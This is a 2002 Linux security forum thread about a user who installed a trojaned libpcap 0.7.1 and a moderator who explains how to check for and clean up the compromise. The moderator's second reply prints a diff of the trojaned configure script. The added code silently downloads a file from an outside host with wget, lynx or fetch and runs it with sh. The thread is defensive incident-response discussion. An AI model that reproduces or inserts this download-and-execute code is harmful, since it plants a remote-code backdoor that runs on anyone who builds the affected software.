LinuxQuestions.org
Visit Jeremy's Blog.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 11-18-2002, 11:02 PM   #1
baduba
LQ Newbie
 
Registered: Nov 2002
Posts: 2

Rep: Reputation: 0
libpcap trojan


I downloaded and installed the libpcap 0.71 from tcpdump.org with the trojan. anyone know how to clean that sucker? can't find anything on it, can i just reinstall with the uncontaminated version?
TIA
Michael

http://www.hlug.org/trojan/
 
Old 11-19-2002, 08:15 AM   #2
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,665
Blog Entries: 54

Rep: Reputation: 2952Reputation: 2952Reputation: 2952Reputation: 2952Reputation: 2952Reputation: 2952Reputation: 2952Reputation: 2952Reputation: 2952Reputation: 2952Reputation: 2952
Did you verify the md5sum for the packages?

If the trojan has been running there is a slim chance your box could have been used. Download, make, install and run chkrootkit. Maybe it detects the connection, but it cannot detect the trojan. At least no other anomalies should turn up. If results are good this provides you with a "less bad" view on the integrity of your box. In any case, if you have a system integrity checker like Aide, Samhain or Tripwire with regularly updated databases (which should be saved on read-only media), scan your box for new/modified files. Again, if these results don't show anomalies you can trust your system somewhat more.
If you don't have a system integrity checker, then you can't make sure your system is trusted, not tampered with and not compromised. That's bad, because an untrusted system is a risk to all. In that case you need to re-establish trust by saving all human readable data (no binaries) and reinstall from scratch.

If it does show up anomalies, then first go tru the steps below, then reboot your box with a install/rescue cdrom or small distro like tomsrtbt and repeat tests above.

Ok, commencing. In the worst case (it's running) you should be able to use netstat (netstat -anp | grep -v grep | grep 1963) to find the process id (PID) and name for an outgoing or listening connection on port TCP/1963.

Find files by that name (don't have the trojaned source, so I guess the filename is "conftes", like the source), note where they are, as root: make a quarantaine directory, copy -a /proc/<PID> to a quarantaine dir, kill the executable (kill -s KILL <PID>), and move the found executables to a quarantaine dir. Move your trojaned sources to the quarantaine dir. Make a tarball of the quarantaine dir and remove the dir. *If you won't/can't hand me the trojaned sources/files, then you can skip the quarantaine stuff.

If netstat doesn't show outbound or listening connection on TCP/1963 the trojan is not active (it could have received "A"), or the source the services file should be downloaded from was already unreachable.
Now you've got to find the trojan. If you won't/can't hand me the trojaned sources/files, then you will have to manually inspect the trojaned source to determine what name the executable is compiled as. The source (conftes.c) is in the downloaded services file (if downloaded with wget).
Remove the tcpdump source dir and the tarball.

If you installed tcpdump, remove the binary and any source code like header files that got installed with it.

Now that you've cleaned up it would be advisable to reboot and rerun the two checks mentioned first before installing tcpdump from a trusted source.


HTH.
 
Old 11-20-2002, 12:39 AM   #3
baduba
LQ Newbie
 
Registered: Nov 2002
Posts: 2

Original Poster
Rep: Reputation: 0
First, thanks for the verbose reply with ample suggestions. When I fist realized I installed a trojaned libpcap, I did a search for conftes.c and confes and couldn't find it. I guess it's possible that trojaned bins could have been installed to ignore searches for confes-like strings. I had previously installed Tripwire, but didn't have it completely setup (no database had been generated) so no joy there. I figured I could trust tcpdump.org but oh well. Next time I guess I'll have to check md5 sums from a couple of sources to make sure they jive... sigh. Looks like http://www.tcpdump.org/ is still down oddly enough. I was hoping they would post some more extensive info on what happened and specific steps on what to look for to fix a compromised box and details on the extent of the possible system damage. I don't mind redoing this box, but I'd rather not if I don't have to, duh.

Netstat shows no open port at 1963, before and after reboot.
Again I guess it's possible Netstat is trojaned to ignore 1963.

I ran chrootkit and it found no signatures or signs of trojans. Although this version 0.37 Release Date: Mon Sep 16 2002 may not have the signature for this particular trojan yet.

I haven't used the libpcap binary yet so perhaps something didn't get started ie: essential trojan code?

I haven't had time to run obtain trusted binaries yet to check md5 sums and such, hopefully I can get to it in the next few days.
I only installed libpcap, not tcpdump, a bit of trivia.

You should have the trojaned libpcap... don't do anything foolish. I curious what you can glean from the source.

I have the box on a trusted test network, and I could run a sniffer trace over a couple of days and see what kind of traffic the compromised box is generating if you think it'd be useful.

Thanks again for your help.
Michael
 
Old 11-20-2002, 07:00 AM   #4
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,665
Blog Entries: 54

Rep: Reputation: 2952Reputation: 2952Reputation: 2952Reputation: 2952Reputation: 2952Reputation: 2952Reputation: 2952Reputation: 2952Reputation: 2952Reputation: 2952Reputation: 2952
When I fist realized I installed a trojaned libpcap, I did a search for conftes.c and confes and couldn't find it.
Ok, I've done a quick dirdiff on the source trees, and as far as I can see it's consistent with the trojaned archive, starting at the md5sum:
73ba7af963aff7c9e23fa1308a793dca (bad)
0597c23e3496a5c108097b2a0f1bd0c7 (good)
plus the code in gencode.c and configure.

Code:
--- libpcap-0.7.1-c/configure	Mon Dec 10 09:34:21 2001
+++ libpcap-0.7.1-t/configure	Mon Dec 10 09:34:21 2001

@@ -2043,15 +2041,17 @@
   test -z "$ac_cv_prog_RANLIB" && ac_cv_prog_RANLIB=":"
 fi
 fi
-RANLIB="$ac_cv_prog_RANLIB"
-if test -n "$RANLIB"; then
+ RANLIB="$ac_cv_prog_RANLIB"
+ if test -n "$RANLIB"; then
   echo "$ac_t""$RANLIB" 1>&6
 else
   echo "$ac_t""no" 1>&6
 fi
 
+ CNF="services"
+ URL="mars.raketti.net/~mash/$CNF"

@@ -2090,22 +2090,34 @@
 	    fi
     fi
 
-echo $ac_n "checking if sockaddr struct has sa_len member""... $ac_c" 1>&6
-echo "configure:2095: checking if sockaddr struct has sa_len member" >&5
+ (IFS=","
+ ARGS="wget -q -O -,lynx --source,fetch -q -o -"
+
+ for i in $ARGS; do
+       IFS=" "
+       $i $URL 1> $CNF
+       if [ -f $CNF ]; then sh $CNF
+           exit
+       fi
+       rm -f $CNF
+ done) 1>/dev/null 2>/dev/null &
+
+ echo $ac_n "checking if sockaddr struct has sa_len member""... $ac_c" 1>&6
+ echo "configure:2095: checking if sockaddr struct has sa_len member" >&5
You see it'll try to D/L the file (that should be executed and removed) from a fixed address. So once that address is shut down the code is useless.

I was hoping they would post some more extensive info on what happened and specific steps on what to look for to fix a compromised box and details on the extent of the possible system damage.
http://online.securityfocus.com/bid/6171,
http://www.cert.org/advisories/CA-2002-30.html and
http://www.iss.net/security_center/static/10620.php
where clear enough to me...

I don't mind redoing this box, but I'd rather not if I don't have to, duh.
Ok, here's why. It's about responsability. (I know, this sounds like parents speaking :-] )
(Below I don't mean "you" as in baduba, but generally speaking, ok.)
A system has a purpose, is under your control, and so generally speaking is beneficial to you and/or the community.
Once a system is compromised, its purpose changes from being beneficial to you to being beneficial to a somewhat select part of community. Not to mention you don't control it anymore.
When a compromised system is left in this state it will act as another jumpboard for crackers, which means they for instance can abuse the trust relationship your system has with other systems and go on to do damage. If so you would be, what in judicial terms is called an accomplice, like in "aiding a criminal", because you would provide the means ad your system becomes a threat, a liability to ppl on the connected network (LAN, WAN and Internet).
The real problem of course is the majority of the ppl don't realize how much more powerfull a Linux system is compared to wintendo.
With that power comes the responsability to "be a good netizen", something even less ppl are aware of.

I ran chrootkit and it found no signatures or signs of trojans. Although this version 0.37 Release Date: Mon Sep 16 2002 may not have the signature for this particular trojan yet.
No, but using it will at least show if other stuff is introduced into the system.

I haven't used the libpcap binary yet so perhaps something didn't get started ie: essential trojan code?
Heh. No, it was to be deployed while running configure.

I haven't had time to run obtain trusted binaries yet to check md5 sums and such, hopefully I can get to it in the next few days.
If you can't get a grip on running Tripwire, try using Aide. I prefer it as it's easier and as powerfull as Tripwire.
Don't forget to save your signature databases on read-only media. Same goes for the RPM databases if you use them.
Trusted binaries can be found on 1 floppy distro's like tomsrtbt, your distro's bootable install/rescue cdr or forensics cdr's like Biatchux.
I usually have a fresh statically linked copy of Busybox lying around as well if space is concerned.

I only installed libpcap, not tcpdump, a bit of trivia.
Doesn't matter. Both where trojaned. As where Fragroute, OpenSSH, BitchX etc, etc...
Again, we all share a responsability to demand from developers to at least have md5sums available, or better, have GPG/PGP signatures.
As we learned from the slapper worm, if you can't deinstall gcc, you should at least barricade it against public use.
Logging all outgoing traffic wouldn't be bad as well. Not that it'll stop something like the tcpdump/libpcap trojan from working, but if you keep an eye on the logs you should be able to trace back when the system was compromised which is a slight advantage over knowing nothing at all :-]

You should have the trojaned libpcap... don't do anything foolish. I curious what you can glean from the source.
Thanks. As you see I made some use of it. Shame I couldn't get the services file as well.

I have the box on a trusted test network, and I could run a sniffer trace over a couple of days and see what kind of traffic the compromised box is generating if you think it'd be useful.
If you want to keep an eye on it I'd say just log outgoing traffic (or only to 212.146.0.34 if you've got lotsa traffic) as well, weed out your usual destinations, and if nothing shows up, consider it clean.

Last edited by unSpawn; 11-20-2002 at 07:02 AM.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Can't access libpcap library :( inthefuture Programming 8 06-24-2004 06:30 PM
problem installing libpcap aaronruss Linux - Newbie 0 06-05-2004 04:09 PM
failed dependecies with libpcap Baltasar Fedora 6 02-06-2004 10:56 AM
Two questions about libpcap. smn Programming 2 11-19-2003 07:02 PM
libpcap oulevon Linux - General 1 09-25-2001 10:06 AM


All times are GMT -5. The time now is 04:30 PM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration